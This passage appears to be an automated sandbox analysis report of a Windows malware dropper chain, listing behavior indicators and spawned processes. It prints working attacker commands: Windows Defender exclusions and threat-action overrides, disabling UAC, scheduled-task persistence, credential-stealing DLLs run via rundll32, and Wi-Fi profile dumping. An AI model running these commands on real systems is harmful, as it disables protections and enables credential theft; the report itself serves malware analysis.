| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u4q0.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u4q0.2\run.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe
"C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe"
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe
"C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe"
C:\Users\Admin\1000013002\7617c78a76.exe
"C:\Users\Admin\1000013002\7617c78a76.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe229eab58,0x7ffe229eab68,0x7ffe229eab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2164 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3024 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3032 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4160 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe
"C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4384 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4492 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4504 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4880 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5044 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4344 -ip 4344
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 888
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3676 -ip 3676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 408
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4720 -ip 4720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 388
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installg.bat" "
C:\Users\Admin\Pictures\rlNOp7Kno1h2LmbasjhWLrqn.exe
"C:\Users\Admin\Pictures\rlNOp7Kno1h2LmbasjhWLrqn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\018789126929_Desktop.zip' -CompressionLevel Optimal
C:\Windows\SysWOW64\sc.exe
Sc delete GameServerClient
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService remove GameServerClient confirm
C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe
"C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe"
C:\Users\Admin\Pictures\6mfAHiyBc4XM7oPwyt8JYLsj.exe
"C:\Users\Admin\Pictures\6mfAHiyBc4XM7oPwyt8JYLsj.exe"
C:\Users\Admin\AppData\Local\Temp\u4q0.0.exe
"C:\Users\Admin\AppData\Local\Temp\u4q0.0.exe"
C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe
"C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe" --silent --allusers=0
C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe
C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6bb6e1d0,0x6bb6e1dc,0x6bb6e1e8
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\FY89lV0dsIhtziZ3BhtAZzWQ.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\FY89lV0dsIhtziZ3BhtAZzWQ.exe" --version
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe
"C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5680 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240425144124" --session-guid=d18f1a97-8516-4848-8107-30921ee6597e --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=2804000000000000
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe
C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x260,0x2c8,0x6afce1d0,0x6afce1dc,0x6afce1e8
C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe
"C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe"
C:\Users\Admin\AppData\Local\Temp\u4q0.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u4q0.2\run.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5552 -ip 5552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5552 -s 1096
C:\Users\Admin\AppData\Local\Temp\u4q0.3.exe
"C:\Users\Admin\AppData\Local\Temp\u4q0.3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6120 -ip 6120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 1536
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService start GameServerClient
C:\Program Files (x86)\GameServerClient\GameService.exe
"C:\Program Files (x86)\GameServerClient\GameService.exe"
C:\Program Files (x86)\GameServerClient\GameServerClient.exe
"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
C:\Windows\Temp\453435.exe
"C:\Windows\Temp\453435.exe" --list-devices
C:\Users\Admin\Pictures\WTaCK9GXrirZJlizQT8dmwTe.exe
"C:\Users\Admin\Pictures\WTaCK9GXrirZJlizQT8dmwTe.exe"
C:\Users\Admin\AppData\Local\Temp\7zS3FD3.tmp\Install.exe
.\Install.exe /RvdidblCuX "385118" /S
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\sc.exe
Sc delete GameServerClientC
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService remove GameServerClientC confirm
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\PVDIpmi.exe\" em /Jzsite_idfcD 385118 /S" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService start GameServerClientC
C:\Program Files (x86)\GameServerClient\GameService.exe
"C:\Program Files (x86)\GameServerClient\GameService.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe
"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
C:\Windows\Temp\605098.exe
"C:\Windows\Temp\605098.exe" --coin BTC -m ADDRESSES -t 0 --range 30ffbf42400000000:30ffbf42440000000 -o xxx0.txt -i C:\Windows\Temp\curjob.bin
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe
"C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5588 -ip 5588
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5588 -ip 5588
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\assistant\assistant_installer.exe" --version
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 960
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x896038,0x896044,0x896050
C:\Users\Admin\Pictures\6mfAHiyBc4XM7oPwyt8JYLsj.exe
"C:\Users\Admin\Pictures\6mfAHiyBc4XM7oPwyt8JYLsj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5540 -ip 5540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5540 -ip 5540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 644
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\PVDIpmi.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\PVDIpmi.exe em /Jzsite_idfcD 385118 /S
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
